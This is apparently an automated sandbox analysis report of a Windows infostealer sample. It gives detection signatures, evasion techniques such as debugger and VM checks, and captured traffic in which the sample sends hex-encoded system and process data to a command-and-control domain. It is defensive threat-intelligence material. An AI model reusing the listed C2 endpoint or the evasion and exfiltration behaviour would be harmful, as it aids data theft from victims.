Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1564519
MD5:2ba6fe9428da32103bb44c955939208d
SHA1:145b071306f5ad32a9385ff9f89bae6a1ec968e9
SHA256:1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4688 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2BA6FE9428DA32103BB44C955939208D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0055DCF0
Source: file.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0059A5B0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0059B560
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0053255D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005329FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 557653Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 18.213.123.165 18.213.123.165
Source: Joe Sandbox ViewIP Address: 34.118.84.150 34.118.84.150
Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FA8C0 recvfrom,0_2_005FA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentykx20pt.top
Source: unknownHTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 557653Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 28 Nov 2024 12:09:58 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1
Source: file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: file.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: file.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016D43E80_3_016D43E8
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CBFC90_3_016CBFC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CBFA30_3_016CBFA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016D43E80_3_016D43E8
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CBFC90_3_016CBFC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_016CBFA30_3_016CBFA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017112380_3_01711238
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0170653D0_3_0170653D
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017027850_3_01702785
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005405B00_2_005405B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00546FA00_2_00546FA0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056F1000_2_0056F100
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FB1800_2_005FB180
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006000E00_2_006000E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BE0300_2_008BE030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005962100_2_00596210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FC3200_2_005FC320
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006004200_2_00600420
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008844100_2_00884410
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053E6200_2_0053E620
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B47800_2_008B4780
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FC7700_2_005FC770
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A7F00_2_0059A7F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008967300_2_00896730
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005449400_2_00544940
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053A9600_2_0053A960
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC9000_2_005EC900
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706AC00_2_00706AC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EAAC00_2_007EAAC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4B600_2_006C4B60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EAB2C0_2_007EAB2C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A8BF00_2_008A8BF0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053CBB00_2_0053CBB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BCC700_2_008BCC70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ACD800_2_008ACD80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4D400_2_008B4D40
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F0D800_2_006F0D80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084AE300_2_0084AE30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00882F900_2_00882F90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554F700_2_00554F70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FEF900_2_005FEF90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8F900_2_005F8F90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005410E60_2_005410E6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089D4300_2_0089D430
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A35B00_2_008A35B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C17800_2_008C1780
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E98800_2_005E9880
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008899200_2_00889920
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3A700_2_008B3A70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A1BD00_2_008A1BD0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00571BE00_2_00571BE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00897CC00_2_00897CC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E9C800_2_007E9C80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00545DB00_2_00545DB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00543ED00_2_00543ED0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00555EB00_2_00555EB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9FE00_2_008B9FE0
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0054CCD0 appears 55 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 005371E0 appears 47 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0070CBC0 appears 104 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0053CAA0 appears 64 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0054CD40 appears 80 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 005750A0 appears 101 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 005373F0 appears 111 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006144A0 appears 76 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 005375A0 appears 696 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00574F40 appears 335 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006E7220 appears 102 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00575340 appears 50 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00574FD0 appears 288 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0053C960 appears 37 times
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exeStatic PE information: Section: dkqxmldn ZLIB complexity 0.9945288575306236
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0053255D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005329FF
Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
